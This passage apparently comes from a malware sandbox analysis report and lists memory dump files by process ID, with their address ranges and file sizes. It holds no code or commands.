                                                                      • memory/1016-124-0x0000000000000000-mapping.dmp
                                                                      • memory/1016-111-0x0000000000000000-mapping.dmp
                                                                      • memory/1048-131-0x0000000000000000-mapping.dmp
                                                                      • memory/1192-127-0x0000000000000000-mapping.dmp
                                                                      • memory/1208-89-0x0000000000000000-mapping.dmp
                                                                      • memory/1208-110-0x0000000000000000-mapping.dmp
                                                                      • memory/1312-85-0x0000000000000000-mapping.dmp
                                                                      • memory/1324-120-0x0000000000000000-mapping.dmp
                                                                      • memory/1328-114-0x0000000000000000-mapping.dmp
                                                                      • memory/1356-90-0x0000000000000000-mapping.dmp
                                                                      • memory/1372-104-0x0000000000000000-mapping.dmp
                                                                      • memory/1448-130-0x0000000000000000-mapping.dmp
                                                                      • memory/1476-118-0x0000000000000000-mapping.dmp
                                                                      • memory/1476-100-0x0000000000000000-mapping.dmp
                                                                      • memory/1512-34-0x0000000000000000-mapping.dmp
                                                                      • memory/1512-36-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp
                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/1516-10-0x0000000000000000-mapping.dmp
                                                                      • memory/1556-109-0x0000000000000000-mapping.dmp
                                                                      • memory/1560-13-0x0000000000000000-mapping.dmp
                                                                      • memory/1568-98-0x0000000000000000-mapping.dmp
                                                                      • memory/1604-32-0x0000000002650000-0x0000000002651000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1604-77-0x000000001B6F0000-0x000000001B6F1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1604-76-0x000000001AB50000-0x000000001AB51000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1604-33-0x0000000002200000-0x0000000002201000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1604-63-0x000000001B9F0000-0x000000001B9F1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1604-28-0x0000000002580000-0x0000000002581000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1604-22-0x0000000000000000-mapping.dmp
                                                                      • memory/1604-24-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp
                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/1620-101-0x0000000000000000-mapping.dmp
                                                                      • memory/1624-105-0x0000000000000000-mapping.dmp
                                                                      • memory/1640-88-0x0000000000000000-mapping.dmp
                                                                      • memory/1648-93-0x0000000000000000-mapping.dmp
                                                                      • memory/1684-96-0x0000000000000000-mapping.dmp
                                                                      • memory/1692-18-0x000000001B5F0000-0x000000001B5F1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1692-2-0x0000000000000000-mapping.dmp
                                                                      • memory/1692-21-0x00000000026A0000-0x00000000026A1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1692-6-0x00000000023D0000-0x00000000023D1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1692-9-0x000000001B520000-0x000000001B521000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1692-20-0x000000001C610000-0x000000001C611000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1692-5-0x000000001AB30000-0x000000001AB31000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1692-19-0x000000001C590000-0x000000001C591000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1692-7-0x00000000025E0000-0x00000000025E1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1692-4-0x0000000002300000-0x0000000002301000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1692-3-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp
                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/1692-17-0x0000000002270000-0x0000000002271000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1760-92-0x0000000000000000-mapping.dmp
                                                                      • memory/1760-112-0x0000000000000000-mapping.dmp
                                                                      • memory/1780-121-0x0000000000000000-mapping.dmp
                                                                      • memory/1920-115-0x0000000000000000-mapping.dmp
                                                                      • memory/1924-97-0x0000000000000000-mapping.dmp